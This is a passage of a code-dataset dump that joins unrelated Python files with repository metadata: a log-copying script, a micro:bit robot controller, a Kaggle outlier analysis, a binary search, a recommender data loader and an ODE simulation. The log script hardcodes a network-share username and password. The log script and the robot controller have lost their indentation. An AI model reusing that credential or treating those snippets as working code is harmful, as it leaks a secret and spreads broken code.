airlog = 'air1_'+d1[6:]+d1[3:5]+d1[0:2]+'.log'
try:
run(['net', 'use', '\\\\192.168.0.92', '/user:onair0', '3A9b'], stdout=PIPE,
stderr=PIPE, shell=True)
    copy('\\\\192.168.0.92\\D$\\ForwardData\\' + airlog, airlog)
with open(airlog) as log1, open('otrabot_za_'+dd[0]+'_'+dd[1]+'_'+dd[2]+'_92.air', 'w') as air:
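        # Each on-air log line like "HH:MM:SS.ss Script take: ... [ item ]" (or
        # "Script skip:") contributes the bracketed playlist item via the capture group.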
regex = (r'\d{2}:\d{2}:\d{2}\.\d{2} (?:Script take:|Script skip:).+ \[ (.+) \]')
air.write(zag)
air.write(''.join([match.group(1)+'\n' for match in finditer(regex, log1.read())]))
except FileNotFoundError:
    print('Required file: ' + airlog)
input('Press ENTER to exit.')
| UTF-8 | Python | false | false | 1,431 | py | 128 | Click_me_NEW.py | 105 | 0.554064 | 0.510067 | 0 | 38 | 34.289474 | 99 |
ncss/projects-2017-7 | 11,287,174,059,345 | 306077130e6a81690c7744f5f44a67f1083e67d8 | e967478ad1d27981b5bd01992f7c7067dfc3cd63 | /BLAA/Robot Scorer.py | fe2841418c616ac6b57fc4aa44fda0ff3cf4d17d | []
| no_license | https://github.com/ncss/projects-2017-7 | fc26c01c69e3377566dd31792b03d4a5e12b74da | d996f26ffa611f57182be99290ba7e395067f3b2 | refs/heads/master | 2021-01-11T18:20:11.668950 | 2017-02-01T03:54:38 | 2017-02-01T03:54:38 | 75,157,337 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from microbit import *
import radio
def forward():
pin0.write_digital(1)
pin16.write_digital(0)
pin12.write_digital(0)
pin8.write_digital(1)
def backward():
pin0.write_digital(0)
pin16.write_digital(1)
pin12.write_digital(1)
pin8.write_digital(0)
def left():
pin0.write_digital(1)
pin16.write_digital(0)
pin12.write_digital(1)
pin8.write_digital(0)
def right():
pin0.write_digital(0)
pin16.write_digital(1)
pin12.write_digital(0)
pin8.write_digital(1)
def stop():
pin0.write_digital(0)
pin16.write_digital(0)
pin12.write_digital(0)
pin8.write_digital(0)
radio.on()
radio.config(channel = 65,
address=0x6e637373)
while True:
message = radio.receive()
if message == "Robot1":
forward()
sleep(1000)
stop()
if message == "Robot2":
backward()
sleep(1000)
stop()
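# A matching transmitter is not part of this file; a minimal sketch for a second
# micro:bit (same channel and address; the "Robot1"/"Robot2" names mirror the
# checks above) could look like this:
#
# from microbit import *
# import radio
#
# radio.on()
# radio.config(channel=65, address=0x6e637373)
# while True:
#     if button_a.was_pressed():
#         radio.send("Robot1")  # drive the robot forward for one second
#     if button_b.was_pressed():
#         radio.send("Robot2")  # drive the robot backward for one second
#     sleep(50)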
| UTF-8 | Python | false | false | 904 | py | 24 | Robot Scorer.py | 17 | 0.625 | 0.547566 | 0 | 46 | 18.652174 | 29 |
hcliu08/competition | 11,965,778,904,437 | 8d3fff0c91efea618100538fa16177a6e1b23539 | 6f9d082ab5a9875c7b13531d6b13f9274f1ba3eb | /Data Scope/Kaggle Competition Outlier Z-score.py | 7e4cc44698813b75c243299b9f9f053f59166dfb | []
| no_license | https://github.com/hcliu08/competition | 5b5c2f3a182442b19332cf33667a3c5b3f7fb4ab | a8e0e3ad678ab14c25c29451e29a9a93cc8299cf | refs/heads/master | 2020-04-27T03:35:52.508077 | 2019-03-29T00:02:43 | 2019-03-29T00:02:43 | 174,028,929 | 0 | 2 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# coding: utf-8
# In[1]:
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
# In[2]:
#Import Data
df_train = pd.read_csv('/Users/yuzhenhe/Desktop/train.csv')
df_test = pd.read_csv('/Users/yuzhenhe/Desktop/test.csv')
# In[7]:
#Drop Columns Target and ID_code
train_X = df_train.drop(columns=['target','ID_code'])
# In[8]:
#Build a dataset with the standardized values
from sklearn import preprocessing
names = train_X.columns
scaler = preprocessing.StandardScaler()
scaled_list = scaler.fit_transform(train_X)
scaled_df = pd.DataFrame(scaled_list, columns=names)
# In[9]:
#Transpose dataset
scaled_X_T = scaled_df.T
scaled_X_L = scaled_X_T.values.tolist()
group = df_train['target'].values.tolist()
# In[10]:
#Find the outlier row indices for each feature column (|z-score| > 2.5)
outliner_index = []
outliner_count = []
outliner_unique = []
for k in scaled_X_L:
p = [i for i, e in enumerate(k) if abs(e)>2.5 ]
r = len(p)
t = list(np.array(group)[p])
outliner_index.append(p)
outliner_count.append(r)
outliner_unique = outliner_unique + p
# In[11]:
#Count how many columns flag each row index as an outlier
dic = {}
for i in outliner_index:
for j in i:
if j in dic:
dic[j] += 1
else:
dic[j] = 1
# In[12]:
dic
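# dic maps a row index to the number of feature columns in which that row is an
# outlier; e.g. dic == {17: 3, ...} would mean row 17 has |z| > 2.5 in 3 columns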
| UTF-8 | Python | false | false | 1,289 | py | 4 | Kaggle Competition Outlier Z-score.py | 4 | 0.649341 | 0.636928 | 0 | 79 | 15.291139 | 59 |
jiesen-zhang/ds-algorithms | 3,221,225,474,432 | 70513ca4c74195dbbabc8dcbc87deb6b2a810bfc | 88a1dbcbd3ef9f5b4b2168133d0fbb24c5ab05e9 | /search-algo/binary-search.py | 3e92c6d94fb05b80474f413661fe2478c6d67961 | []
| no_license | https://github.com/jiesen-zhang/ds-algorithms | 845acd61041da6be50f5a42c307b859503a1aad3 | c1463b4b319c467483e374cd9291952e5db281b3 | refs/heads/main | 2023-06-28T14:36:57.979276 | 2021-07-22T17:35:41 | 2021-07-22T17:35:41 | 388,284,417 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | '''
Binary Search
Returns the index for the target element. If target element is not found, returns index of where it would be in sorted array.
Time: O(log n)
Space: O(1)
'''
def binarySearch(nums: [int], target: int) -> int:
if len(nums) == 1:
return 0 if target <= nums[0] else 1
left, right = 0, len(nums) - 1
while(left <= right):
mid = (left + right) // 2
if target == nums[mid]:
return mid
elif target > nums[mid]:
left = mid + 1
else:
right = mid - 1
return left
nums = [1, 2, 3, 4]
target = 0
print(binarySearch(nums, target))
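# A couple of extra sanity checks covering both behaviors from the docstring:
print(binarySearch([1, 3, 5, 7], 5))  # 2 (exact match)
print(binarySearch([1, 3, 5, 7], 4))  # 2 (insertion index for a missing target)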
| UTF-8 | Python | false | false | 593 | py | 2 | binary-search.py | 1 | 0.595278 | 0.569983 | 0 | 28 | 20.178571 | 125 |
nistpenning/calc | 17,549,236,386,207 | 27182bac3d830c5a13377852ffd4f8ac3b0b2b80 | aff5cc92f38213a45323d7dede291dd918e96519 | /analysis/Angular_Momentum/Triangle.py | cf8750235f9b1cf5d8201a085e33bb020020e234 | []
| no_license | https://github.com/nistpenning/calc | bd475b75a36ba93e74356a37529d0f9dac30a083 | 15d651bcc5c067032041b5ad9cf0be38169bb750 | refs/heads/master | 2021-01-18T22:59:31.619436 | 2015-11-03T23:44:05 | 2015-11-03T23:44:05 | 32,483,830 | 3 | 1 | null | false | 2015-06-17T16:58:16 | 2015-03-18T20:54:43 | 2015-06-10T02:53:48 | 2015-06-17T16:58:16 | 482 | 2 | 0 | 0 | Matlab | null | null | """
Tests the triangle inequalities in Messiah, A. "Quantum Mechanics" v. 2,
pg. 1062 (North-Holland, Amsterdam) 1962. Returns True if the inequalities
are satisfied, False if not. Also tests whether the triad sums to an integer.
Written: KAE University at Albany Physics Department 26 Oct 08
"""
from numpy import *
def Triangle(x,y,z):
if ((abs(x-y) <= z) and (z <= x+y) and (floor(x+y+z) == x+y+z)):
test = True
else:
test = False
return test
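# Illustrative calls (values chosen arbitrarily, not from the original module):
# print(Triangle(1, 2, 3))    # True:  |1-2| <= 3 <= 1+2 and 1+2+3 is an integer
# print(Triangle(1, 1, 3))    # False: 3 > 1+1 violates the triangle inequality
# print(Triangle(0.5, 1, 1))  # False: 0.5+1+1 = 2.5 is not an integer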
| UTF-8 | Python | false | false | 476 | py | 122 | Triangle.py | 52 | 0.653361 | 0.62605 | 0 | 18 | 25.444444 | 75 |
wengyuanwy/Generative-Adversarial-User-Model-for-Reinforcement-Learning-Based-Recommendation-System-Pytorch | 5,085,241,319,587 | 587858b491e17bae3a6398c8dd075d777c33ffa4 | 53081aae2779bb4d5253a18fc2c7126081050445 | /data_utils.py | 97d802a8375e24e1f65ac01b14c7c74397db9c53 | [
"MIT"
]
| permissive | https://github.com/wengyuanwy/Generative-Adversarial-User-Model-for-Reinforcement-Learning-Based-Recommendation-System-Pytorch | 630bf76ad383679345cb427cf6170ee69ba5eb4f | 4e5479c4ff4c200fc3171c2c058893cb0bebe73d | refs/heads/master | 2023-02-22T03:23:26.526124 | 2021-01-30T12:55:44 | 2021-01-30T12:55:44 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from past.builtins import xrange
import pickle
import numpy as np
import os
# stays close to the original implementation
class Dataset(object):
"""docstring for Dataset"""
def __init__(self, args):
super(Dataset, self).__init__()
self.data_folder = args.data_folder
self.dataset = args.dataset
self.model_type = args.user_model
self.band_size = args.pw_band_size
#load the data
data_filename = os.path.join(args.data_folder, args.dataset+'.pkl')
f = open(data_filename, 'rb')
data_behavior = pickle.load(f) # time and user behavior
item_feature = pickle.load(f) # identity matrix
f.close()
self.size_item = len(item_feature)
self.size_user = len(data_behavior)
self.f_dim = len(item_feature[0])
        # load the indices for the train/validation/test split
filename = os.path.join(self.data_folder, self.dataset+'-split.pkl')
pkl_file = open(filename, 'rb')
self.train_user = pickle.load(pkl_file)
self.vali_user = pickle.load(pkl_file)
self.test_user = pickle.load(pkl_file)
pkl_file.close()
# process the data
        # find the maximum number of items displayed to a user at one time
k_max = 0
for d_b in data_behavior:
for disp in d_b[1]:
k_max = max(k_max, len(disp))
self.data_click = [[] for x in xrange(self.size_user)]
self.data_disp = [[] for x in xrange(self.size_user)]
        self.data_time = np.zeros(self.size_user, dtype=int)
        self.data_news_cnt = np.zeros(self.size_user, dtype=int)
self.feature = [[] for x in xrange(self.size_user)]
self.feature_click = [[] for x in xrange(self.size_user)]
for user in xrange(self.size_user):
# (1) count number of clicks
click_t = 0
num_events = len(data_behavior[user][1])
click_t += num_events
self.data_time[user] = click_t
# (2)
news_dict = {}
self.feature_click[user] = np.zeros([click_t, self.f_dim])
click_t = 0
for event in xrange(num_events):
disp_list = data_behavior[user][1][event]
pick_id = data_behavior[user][2][event]
for id in disp_list:
if id not in news_dict:
                        news_dict[id] = len(news_dict)  # per-user news ids start from 0
id = pick_id
self.data_click[user].append([click_t, news_dict[id]])
self.feature_click[user][click_t] = item_feature[id]
for idd in disp_list:
self.data_disp[user].append([click_t, news_dict[idd]])
                click_t += 1  # split an event with 2 clicks into 2 separate events
self.data_news_cnt[user] = len(news_dict)
self.feature[user] = np.zeros([self.data_news_cnt[user], self.f_dim])
for id in news_dict:
self.feature[user][news_dict[id]] = item_feature[id]
self.feature[user] = self.feature[user].tolist()
self.feature_click[user] = self.feature_click[user].tolist()
self.max_disp_size = k_max
def random_split_user(self):
        # arguably unnecessary if the initial split is already random
num_users = len(self.train_user) + len(self.vali_user) + len(self.test_user)
shuffle_order = np.arange(num_users)
np.random.shuffle(shuffle_order)
self.train_user = shuffle_order[0:len(self.train_user)].tolist()
self.vali_user = shuffle_order[len(self.train_user):len(self.train_user)+len(self.vali_user)].tolist()
self.test_user = shuffle_order[len(self.train_user)+len(self.vali_user):].tolist()
def data_process_for_placeholder(self, user_set):
#print ("user_set",user_set)
if self.model_type == 'PW':
sec_cnt_x = 0
news_cnt_short_x = 0
news_cnt_x = 0
click_2d_x = []
disp_2d_x = []
tril_indice = []
tril_value_indice = []
disp_2d_split_sec = []
feature_clicked_x = []
disp_current_feature_x = []
click_sub_index_2d = []
# started with the validation set
#print (user_set)
#[703, 713, 723, 733, 743, 753, 763, 773, 783, 793, 803, 813, 823, 833, 843, 853, 863, 873, 883, 893, 903, 913, 923, 933, 943, 953, 963, 973, 983, 993, 1003, 1013, 1023, 1033, 1043, 1053]
#user_set = [703]
for u in user_set:
t_indice = []
#print ("the us is ",u) 703
#print (self.band_size,self.data_time[u]) 20,1
#print ("the loop",self.data_time[u]-1)
for kk in xrange(min(self.band_size-1, self.data_time[u]-1)):
t_indice += map(lambda x: [x + kk+1 + sec_cnt_x, x + sec_cnt_x], np.arange(self.data_time[u] - (kk+1)))
# print (t_indice) [] for 703
tril_indice += t_indice
tril_value_indice += map(lambda x: (x[0] - x[1] - 1), t_indice)
#print ("THE Click data is ",self.data_click[u]) #THE Click data is [[0, 0], [1, 8], [2, 14]] for u =15
click_2d_tmp = map(lambda x: [x[0] + sec_cnt_x, x[1]], self.data_click[u])
click_2d_tmp = list(click_2d_tmp)
#print (list(click_2d_tmp))
#print (list(click_2d_tmp))
click_2d_x += click_2d_tmp
#print ("tenp is ",click_2d_x,list(click_2d_tmp)) # [[0, 0], [1, 8], [2, 14]] for u15
#print ("dispaly data is ", self.data_disp[u]) [0,0]
disp_2d_tmp = map(lambda x: [x[0] + sec_cnt_x, x[1]], self.data_disp[u])
disp_2d_tmp = list(disp_2d_tmp)
#y=[]
#y+=disp_2d_tmp
#print (disp_2d_tmp, click_2d_tmp)
click_sub_index_tmp = map(lambda x: disp_2d_tmp.index(x), (click_2d_tmp))
click_sub_index_tmp = list(click_sub_index_tmp)
#print ("the mess is ",click_sub_index_tmp)
click_sub_index_2d += map(lambda x: x+len(disp_2d_x), click_sub_index_tmp)
#print ("click_sub_index_2d",click_sub_index_2d)
disp_2d_x += disp_2d_tmp
#print ("disp_2d_x",disp_2d_x) # [[0, 0]]
#sys.exit()
disp_2d_split_sec += map(lambda x: x[0] + sec_cnt_x, self.data_disp[u])
sec_cnt_x += self.data_time[u]
news_cnt_short_x = max(news_cnt_short_x, self.data_news_cnt[u])
news_cnt_x += self.data_news_cnt[u]
disp_current_feature_x += map(lambda x: self.feature[u][x], [idd[1] for idd in self.data_disp[u]])
feature_clicked_x += self.feature_click[u]
out1 ={}
out1['click_2d_x']=click_2d_x
out1['disp_2d_x']=disp_2d_x
out1['disp_current_feature_x']=disp_current_feature_x
out1['sec_cnt_x']=sec_cnt_x
out1['tril_indice']=tril_indice
out1['tril_value_indice']=tril_value_indice
out1['disp_2d_split_sec']=disp_2d_split_sec
out1['news_cnt_short_x']=news_cnt_short_x
out1['click_sub_index_2d']=click_sub_index_2d
out1['feature_clicked_x']=feature_clicked_x
# print ("out",out1['tril_value_indice'])
# sys.exit()
return out1
else:
news_cnt_short_x = 0
u_t_dispid = []
u_t_dispid_split_ut = []
u_t_dispid_feature = []
u_t_clickid = []
size_user = len(user_set)
max_time = 0
click_sub_index = []
for u in user_set:
max_time = max(max_time, self.data_time[u])
user_time_dense = np.zeros([size_user, max_time], dtype=np.float32)
click_feature = np.zeros([max_time, size_user, self.f_dim])
for u_idx in xrange(size_user):
u = user_set[u_idx]
u_t_clickid_tmp = []
u_t_dispid_tmp = []
for x in self.data_click[u]:
t, click_id = x
click_feature[t][u_idx] = self.feature[u][click_id]
u_t_clickid_tmp.append([u_idx, t, click_id])
user_time_dense[u_idx, t] = 1.0
u_t_clickid = u_t_clickid + u_t_clickid_tmp
for x in self.data_disp[u]:
t, disp_id = x
u_t_dispid_tmp.append([u_idx, t, disp_id])
u_t_dispid_split_ut.append([u_idx, t])
u_t_dispid_feature.append(self.feature[u][disp_id])
click_sub_index_tmp = map(lambda x: u_t_dispid_tmp.index(x), u_t_clickid_tmp)
click_sub_index += map(lambda x: x+len(u_t_dispid), click_sub_index_tmp)
u_t_dispid = u_t_dispid + u_t_dispid_tmp
news_cnt_short_x = max(news_cnt_short_x, self.data_news_cnt[u])
if self.model_type != 'LSTM':
print('model type not supported. using LSTM')
out = {}
out['size_user']=size_user
out['max_time']=max_time
out['news_cnt_short_x']=news_cnt_short_x
out['u_t_dispid']=u_t_dispid
out['u_t_dispid_split_ut']=u_t_dispid_split_ut
out['u_t_dispid_feature']=np.array(u_t_dispid_feature)
out['click_feature']=click_feature
out['click_sub_index']=click_sub_index
out['u_t_clickid']=u_t_clickid
out['user_time_dense']=user_time_dense
return out
def data_process_for_placeholder_L2(self, user_set):
news_cnt_short_x = 0
u_t_dispid = []
u_t_dispid_split_ut = []
u_t_dispid_feature = []
u_t_clickid = []
size_user = len(user_set)
max_time = 0
click_sub_index = []
for u in user_set:
max_time = max(max_time, self.data_time[u])
user_time_dense = np.zeros([size_user, max_time], dtype=np.float32)
click_feature = np.zeros([max_time, size_user, self.f_dim])
for u_idx in xrange(size_user):
u = user_set[u_idx]
item_cnt = [{} for _ in xrange(self.data_time[u])]
u_t_clickid_tmp = []
u_t_dispid_tmp = []
for x in self.data_disp[u]:
t, disp_id = x
u_t_dispid_split_ut.append([u_idx, t])
u_t_dispid_feature.append(self.feature[u][disp_id])
if disp_id not in item_cnt[t]:
item_cnt[t][disp_id] = len(item_cnt[t])
u_t_dispid_tmp.append([u_idx, t, item_cnt[t][disp_id]])
for x in self.data_click[u]:
t, click_id = x
click_feature[t][u_idx] = self.feature[u][click_id]
u_t_clickid_tmp.append([u_idx, t, item_cnt[t][click_id]])
user_time_dense[u_idx, t] = 1.0
u_t_clickid = u_t_clickid + u_t_clickid_tmp
click_sub_index_tmp = map(lambda x: u_t_dispid_tmp.index(x), u_t_clickid_tmp)
click_sub_index += map(lambda x: x+len(u_t_dispid), click_sub_index_tmp)
u_t_dispid = u_t_dispid + u_t_dispid_tmp
# news_cnt_short_x = max(news_cnt_short_x, data_news_cnt[u])
news_cnt_short_x = self.max_disp_size
out = {}
out['size_user']=size_user
out['max_time']=max_time
out['news_cnt_short_x']=news_cnt_short_x
out['u_t_dispid']=u_t_dispid
out['u_t_dispid_split_ut']=u_t_dispid_split_ut
out['u_t_dispid_feature']=np.array(u_t_dispid_feature)
out['click_feature']=click_feature
out['click_sub_index']=click_sub_index
out['u_t_clickid']=u_t_clickid
out['user_time_dense']=user_time_dense
return out
def prepare_validation_data_L2(self, num_sets, v_user):
vali_thread_u = [[] for _ in xrange(num_sets)]
size_user_v = [[] for _ in xrange(num_sets)]
max_time_v = [[] for _ in xrange(num_sets)]
news_cnt_short_v = [[] for _ in xrange(num_sets)]
u_t_dispid_v = [[] for _ in xrange(num_sets)]
u_t_dispid_split_ut_v = [[] for _ in xrange(num_sets)]
u_t_dispid_feature_v = [[] for _ in xrange(num_sets)]
click_feature_v = [[] for _ in xrange(num_sets)]
click_sub_index_v = [[] for _ in xrange(num_sets)]
u_t_clickid_v = [[] for _ in xrange(num_sets)]
ut_dense_v = [[] for _ in xrange(num_sets)]
for ii in xrange(len(v_user)):
vali_thread_u[ii % num_sets].append(v_user[ii])
for ii in xrange(num_sets):
out=self.data_process_for_placeholder_L2(vali_thread_u[ii])
size_user_v[ii], max_time_v[ii], news_cnt_short_v[ii], u_t_dispid_v[ii],\
u_t_dispid_split_ut_v[ii], u_t_dispid_feature_v[ii], click_feature_v[ii], \
click_sub_index_v[ii], u_t_clickid_v[ii], ut_dense_v[ii] = out['size_user'],\
out['max_time'],\
out['news_cnt_short_x'],\
out['u_t_dispid'], \
out['u_t_dispid_split_ut'],\
out['u_t_dispid_feature'],\
out['click_feature'],\
out['click_sub_index'],\
out['u_t_clickid'],\
out['user_time_dense']
out2={}
out2['vali_thread_u']=vali_thread_u
out2['size_user_v']=size_user_v
out2['max_time_v']=max_time_v
out2['news_cnt_short_v'] =news_cnt_short_v
out2['u_t_dispid_v'] =u_t_dispid_v
out2['u_t_dispid_split_ut_v']=u_t_dispid_split_ut_v
out2['u_t_dispid_feature_v']=u_t_dispid_feature_v
out2['click_feature_v']=click_feature_v
out2['click_sub_index_v']=click_sub_index_v
out2['u_t_clickid_v']=u_t_clickid_v
out2['ut_dense_v']=ut_dense_v
return out2
def prepare_validation_data(self, num_sets, v_user):
if self.model_type == 'PW':
vali_thread_u = [[] for _ in xrange(num_sets)]
click_2d_v = [[] for _ in xrange(num_sets)]
disp_2d_v = [[] for _ in xrange(num_sets)]
feature_v = [[] for _ in xrange(num_sets)]
sec_cnt_v = [[] for _ in xrange(num_sets)]
tril_ind_v = [[] for _ in xrange(num_sets)]
tril_value_ind_v = [[] for _ in xrange(num_sets)]
disp_2d_split_sec_v = [[] for _ in xrange(num_sets)]
feature_clicked_v = [[] for _ in xrange(num_sets)]
news_cnt_short_v = [[] for _ in xrange(num_sets)]
click_sub_index_2d_v = [[] for _ in xrange(num_sets)]
for ii in xrange(len(v_user)):
vali_thread_u[ii % num_sets].append(v_user[ii])
for ii in xrange(num_sets):
out=self.data_process_for_placeholder(vali_thread_u[ii])
# print ("out_val",out['tril_indice'])
# sys.exit()
click_2d_v[ii], disp_2d_v[ii], feature_v[ii], sec_cnt_v[ii], tril_ind_v[ii], tril_value_ind_v[ii], \
disp_2d_split_sec_v[ii], news_cnt_short_v[ii], click_sub_index_2d_v[ii], feature_clicked_v[ii] = out['click_2d_x'], \
out['disp_2d_x'], \
out['disp_current_feature_x'], \
out['sec_cnt_x'], \
out['tril_indice'], \
out['tril_value_indice'], \
out['disp_2d_split_sec'], \
out['news_cnt_short_x'], \
out['click_sub_index_2d'], \
out['feature_clicked_x']
out2={}
out2['vali_thread_u']=vali_thread_u
out2['click_2d_v']=click_2d_v
out2['disp_2d_v']=disp_2d_v
out2['feature_v']=feature_v
out2['sec_cnt_v']=sec_cnt_v
out2['tril_ind_v']=tril_ind_v
out2['tril_value_ind_v']=tril_value_ind_v
out2['disp_2d_split_sec_v']=disp_2d_split_sec_v
out2['news_cnt_short_v']=news_cnt_short_v
out2['click_sub_index_2d_v']=click_sub_index_2d_v
out2['feature_clicked_v']=feature_clicked_v
return out2
else:
if self.model_type != 'LSTM':
print('model type not supported. using LSTM')
vali_thread_u = [[] for _ in xrange(num_sets)]
size_user_v = [[] for _ in xrange(num_sets)]
max_time_v = [[] for _ in xrange(num_sets)]
news_cnt_short_v = [[] for _ in xrange(num_sets)]
u_t_dispid_v = [[] for _ in xrange(num_sets)]
u_t_dispid_split_ut_v = [[] for _ in xrange(num_sets)]
u_t_dispid_feature_v = [[] for _ in xrange(num_sets)]
click_feature_v = [[] for _ in xrange(num_sets)]
click_sub_index_v = [[] for _ in xrange(num_sets)]
u_t_clickid_v = [[] for _ in xrange(num_sets)]
ut_dense_v = [[] for _ in xrange(num_sets)]
for ii in xrange(len(v_user)):
vali_thread_u[ii % num_sets].append(v_user[ii])
for ii in xrange(num_sets):
out = self.data_process_for_placeholder(vali_thread_u[ii])
size_user_v[ii], max_time_v[ii], news_cnt_short_v[ii], u_t_dispid_v[ii],\
u_t_dispid_split_ut_v[ii], u_t_dispid_feature_v[ii], click_feature_v[ii], \
                click_sub_index_v[ii], u_t_clickid_v[ii], ut_dense_v[ii] = out['size_user'], \
                                                                           out['max_time'], \
                                                                           out['news_cnt_short_x'], \
                                                                           out['u_t_dispid'], \
                                                                           out['u_t_dispid_split_ut'], \
                                                                           out['u_t_dispid_feature'], \
                                                                           out['click_feature'], \
                                                                           out['click_sub_index'], \
                                                                           out['u_t_clickid'], \
                                                                           out['user_time_dense']
out2 = {}
out2['vali_thread_u']=vali_thread_u
out2['size_user_v']=size_user_v
out2['max_time_v']=max_time_v
out2['news_cnt_short_v']=news_cnt_short_v
out2['u_t_dispid_v']=u_t_dispid_v
out2['u_t_dispid_split_ut_v']=u_t_dispid_split_ut_v
out2['u_t_dispid_feature_v']=u_t_dispid_feature_v
out2['click_feature_v']=click_feature_v
out2['click_sub_index_v']=click_sub_index_v
out2['u_t_clickid_v']=u_t_clickid_v
out2['ut_dense_v']=ut_dense_v
return out2
| UTF-8 | Python | false | false | 19,330 | py | 8 | data_utils.py | 6 | 0.494413 | 0.478427 | 0 | 445 | 41.429213 | 199 |
vijayjag-repo/LeetCode | 8,632,884,315,610 | 2f727b0d0a852b60a1e78a3f21e8acbc5e2e68a5 | 9c63f6d39a6085674ab42d1488476d0299f39ec9 | /Python/LC_Balanced_Binary_Tree.py | c57c1e3b2bae5d2db27ba76a6f3dd287ba6760ef | []
| no_license | https://github.com/vijayjag-repo/LeetCode | 2237e3117e7e902f5ac5c02bfb5fbe45af7242d4 | 0a5f47e272f6ba31e3f0ff4d78bf6e3f4063c789 | refs/heads/master | 2022-11-14T17:46:10.847858 | 2022-11-08T10:28:30 | 2022-11-08T10:28:30 | 163,639,628 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def isBalanced(self, root):
"""
:type root: TreeNode
:rtype: bool
Approach:
Find depth recursively.
Store the max_difference between depths of left and right subtrees.
If this value is greater than 1, it is not balanced. Else, balanced.
"""
self.max_difference = 0
def helper(root):
if not root:
return(0)
else:
left = helper(root.left)
right = helper(root.right)
self.max_difference = max(self.max_difference,abs(left-right))
return(1+max(left,right))
helper(root)
return(False if self.max_difference>1 else True)
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def isBalanced(self, root):
"""
:type root: TreeNode
:rtype: bool
"""
def depth(node):
if not node:
return 0
else:
left = depth(node.left)
right = depth(node.right)
if (left == -1 or right == -1 or abs(left-right) > 1):
return -1
return 1 + max(left,right)
return depth(root) != -1
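# Minimal usage sketch (assumes a concrete TreeNode like the commented stub above):
# root = TreeNode(1)
# root.left = TreeNode(2)
# root.left.left = TreeNode(3)        # left subtree depth 2 vs right subtree depth 0
# print(Solution().isBalanced(root))  # False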
| UTF-8 | Python | false | false | 1,572 | py | 219 | LC_Balanced_Binary_Tree.py | 217 | 0.506361 | 0.498728 | 0 | 56 | 27.071429 | 78 |
dolphin-in-a-coma/python-course | 7,499,012,933,376 | b8ecde6100d505e4a95c792e07950886b3624cf6 | 772915fc1d85ba50892d6aadcff9d5d55e1a62b5 | /2-9_Rest_subjects/6_Time_complexity/6.2.3.py | cca46721a19d18ce0cf767483f1e1ac4ae358d07 | []
| no_license | https://github.com/dolphin-in-a-coma/python-course | eb90b9797e4ef397acd1577b30c31e372ffb6ed7 | c5dd67c3e699a62eb5f9594bc13dabbed830fecc | refs/heads/master | 2020-04-15T19:24:53.277011 | 2019-01-09T22:48:04 | 2019-01-09T22:48:04 | 164,948,718 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #функция возвращает сумму цифр
# complexity = O(N)
def foo(s):
    # s is a string
val = 0
for c in s:
if c.isdigit():
val += int(c)
return val
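# Quick check (input chosen for illustration): digits 1, 2, 3 sum to 6
print(foo('a1b2c3'))  # 6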
| UTF-8 | Python | false | false | 213 | py | 232 | 6.2.3.py | 188 | 0.511628 | 0.505814 | 0 | 10 | 16.2 | 30 |
medision/dtwa_bbgky_fermions | 19,043,885,016,852 | 05b516c47d708288965f48a963c1000bd35add11 | b389b7f2f38f370cfc8cb92d49fe7d8a4f76c767 | /main.py | ee6f1601c0cddb39775bfd7ccd2e88b4504a6265 | []
| no_license | https://github.com/medision/dtwa_bbgky_fermions | 3cba385124e1a1ca7941f82ab00fa3ec025db788 | 75454ce5f94a43ec9a82181c89126dea370060bd | refs/heads/main | 2023-03-18T23:30:42.647050 | 2020-12-08T10:36:22 | 2020-12-08T10:36:22 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from ginSODA.ginsoda import *
from pylab import *
import os
if __name__ == '__main__':
os.chdir('./ginSODA')
# Example of Enzyme Kinetics
GS = ginSetup()
GS.add_variables(["Substrate", "Enzyme", "Complex", "Product"])
GS.add_parameters(["k0", "k1", "z2"])
GS.add_equations([
"-k0*Substrate*Enzyme+k1*Complex", # S: S+E->ES, ES->S+E
"-k0*Substrate*Enzyme+k1*Complex+z2*Complex", # E: S+E->ES, ES->S+E, ES -> P+E
"+k0*Substrate*Enzyme-k1*Complex-z2*Complex", # ES: S+E->ES, ES -> S+E, ES -> P+E
"+z2*Complex"]) # P: ES -> P+E
GS.set_model_dir("../data/MODELTEST")
GS.set_output_dir("../data/OUTPUTDIR")
GS.set_output_prefix("../data/PREFIX")
GS.check_reactions()
GS.force_rebuild = False
THREADS = 4096
# parameters = [[0.0025,0.1,5.0]]*THREADS
parameters = []
perturbation = linspace(2.5e-3, 2.5e-2, THREADS)
    for x in range(THREADS):
parameters.append([perturbation[x], 0.1, 5.0])
initial_values = [[1000, 500, 0, 0]] * THREADS
# initial_values = arange(2*THREADS).reshape(THREADS,2)
time_instants = linspace(0, 5, 50)
atol_vector = [[1e-6]] * THREADS
rtol = 1e-4
max_steps = 500
# GS.estimate_memory_requirements(THREADS, time_instants)
# exit()
# GS._use_shared_memory = True
all_dynamics = GS.run(
lsoda_settings={'max_steps': max_steps, 'atol_vector': atol_vector, 'rtol': rtol},
parameters=parameters,
initial_values=initial_values,
time_instants=time_instants,
no_simulation=False
)
# exit()
    for s in range(4):
        plot(all_dynamics[0].T[0], all_dynamics[0].T[s + 1], label=GS.SD.variables[s] + "\\_model1")
    for s in range(4):
        plot(all_dynamics[32].T[0], all_dynamics[32].T[s + 1], "--", label=GS.SD.variables[s] + "\\_model2")
legend(ncol=2)
show()
| UTF-8 | Python | false | false | 1,895 | py | 29 | main.py | 22 | 0.583113 | 0.545119 | 0 | 56 | 32.839286 | 107 |
benwei/Learnings | 12,506,944,792,559 | c9e4d212d9f5192042c0263db83fd853c1afd71d | 10e3f9659affb4c74280ee27a6e485c8d7e86c56 | /pySamples/test08_any_in_list.py | 394161f3b7b1510442110023279a046f28cfeec3 | []
